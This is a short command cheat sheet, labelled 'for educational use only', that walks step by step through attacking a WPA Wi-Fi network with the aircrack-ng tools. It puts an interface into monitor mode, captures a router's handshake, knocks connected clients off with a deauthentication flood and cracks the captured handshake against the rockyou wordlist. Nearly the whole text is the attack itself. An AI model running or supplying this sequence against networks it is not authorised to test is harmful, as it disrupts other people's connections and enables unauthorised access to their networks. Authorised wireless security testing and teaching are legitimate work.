This is for educational use only

To stop any Wi Fi connections

airmon-ng check kill

To show your interface

airmon-ng

To start the wifi interface in monitor mode

airmon-ng start wlan0

To show the current clients on the network

airodump-ng wlan0mon

To show the beacons and the clients that are connected, and possibly get the handshake, and writing it to the hack file

airodump-ng -c 1 --write /root/desktop/hack --bssid mac addr of router wlan0mon

To deauthorize the client

aireplay-ng --deauth 5 -a mac addr of router wlan0mon

To start cracking the handshake

aircrack-ng -a2 -b mac addr of router -w /root/desktop/rockyou.txt /root/desktop/hack-01.cap